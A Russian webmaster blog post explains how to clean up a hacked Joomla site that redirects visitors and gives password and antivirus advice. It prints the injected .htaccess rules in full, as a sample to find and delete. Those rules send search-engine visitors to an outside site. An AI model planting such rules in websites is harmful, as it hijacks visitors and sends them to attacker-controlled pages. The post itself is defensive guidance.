Купить SSD Хостинг   

WebHelpCenter.ru Все что может пригодится вебмастеру, администратору сервера, хостинга, программисту и новичку в интернете

Сети
Поиск по сайту
Разделы сайта
Подробнее о...
Календарь
«    Январь 2018    »
ПнВтСрЧтПтСбВс
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 
Архив новостей
Полезное
Облако тегов
Популярные новости
Скачать Игры бесплатно
Скачать alawar Игры бесплатно
Друзья
Самое дорогое

Сайт взломали! Автоматическая переадресация на другой сайт

Сегодня столкнулся проблемой, один из сайтов был взломан, построенный на Joomla
Долго копался в решении проблемы, пересмотрел почти все файлы, пересмотрел базу данных, но в конечном итоге нашел :) Просто сразу не заметил :(

Значить ситуация такая.

Когда администратор или пользователь заходит в админ панель на Joomle, когда пытается создать или редактировать пользователя , то его сразу переадресовывает на како-то сайт. В моей ситуации это был : http://10sp.co.cc/fra/show.php

Переадресация может быть и когда посетитель заходит на сайт.

Как решить проблему?

Найдите все файлы .htaccess и внимательно посмотрите в него, если вы увидете подобное то удаляйте это все!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://10sp.co.cc/fra/show.php [R=301,L]


Это значит что все пришедшие посетители с поисковых систем перенаправляются на другой сайт. В нашем случае это : http://10sp.co.cc/fra/show.php

Удалите немедлено это со всех файлов .htaccess или в обще удалите эти файлы если там нет ничего что относится к сайту.
Обязательно ищите эти файлы не только в /public_html/
а и в самом корне ./ учетной записи, там тоже могут быть файлы .htaccess и в папках .htaccess/.htaccess
Обязательно их проверьте!

Ка могли сайт взломать ?

Очень просто! В большей вероятности у вас украли пароли к FTP

Что нужно сразу сделать ?

1. Установить антивирус программу, если вы не имеете еe. Если у вас уже установлен антивирус то обновите антивирусные базы. Также не все антивирусы эффективны, проверяйте компьютер несколькими антивирусными программами. Например имея установленный один антивирус, вы можете скачать с сайта http://www.freedrweb.com/ бесплатную утилиту Dr.Web CureIt! и проверить им.

Также хорошо иметь Firewall и Spyware защиту. Например ZoneAlarm, которая включает в себе эти две возможности. А так же эти возможности имеют и другие программы, например Agnitum Outpost Firewall ....

2. Немедленно сменить пароль на фтп (FTP) и к панели управления

3. Немедленно сменить пароли на подключения к базе, почтовым ящикам, а также, логины и пароли, которые хранились в конфигурационных файлах (хакер мог их уже посмотреть).

4. Периодически выполнять смену паролей доступа к FTP

Что нужно делать, чтобы максимально обезопасить себя от вирусов на сайтах и вломов сайта?

1. Ставьте антивирусы и Фаирволы!!! Они помогают. Не всегда, но помогают.

2. Используйте альтернативные браузеры последних версий (Opera, Firefox). Забудьте о Internet Explorer. 90 процентов вирусов-троянов загружаемых через интернет используют уязвимости именно этого браузера. У Firefox (http://www.mozilla.org/) этих самых уязвимостей на два порядка меньше.

3. Не сохраняйте пароли в фтп-клиентах. Они уязвимы и своровать оттуда пароль очень легко.

4. Регулярно поглядывайте на сайт и проверяйте файлы своего сайта.

И в заключении, бывает что с вашим компьютером все в порядке и он не содержит вирусов и шпионов но это не гарантирует сохранности паролей. Некоторые трояны имеют функции "сниффера" (Сниффер - программа для перехвата и анализа сетевого трафика) и находясь на каком-то другом компьютере в вашей подсети вполне могут, путем анализа траффика подсети, заполучить ваш пароль. Тем более что пароли FTP не шифруются. То есть для гарантии сохранности паролей необходим полный комплекс защитных мер для всей сети в целом а не только для одного лишь вашего компьютера.
Опубликовал admin, 18-10-2009, 18:47 | Комментировать (0) | Печать
 (голосов: 3)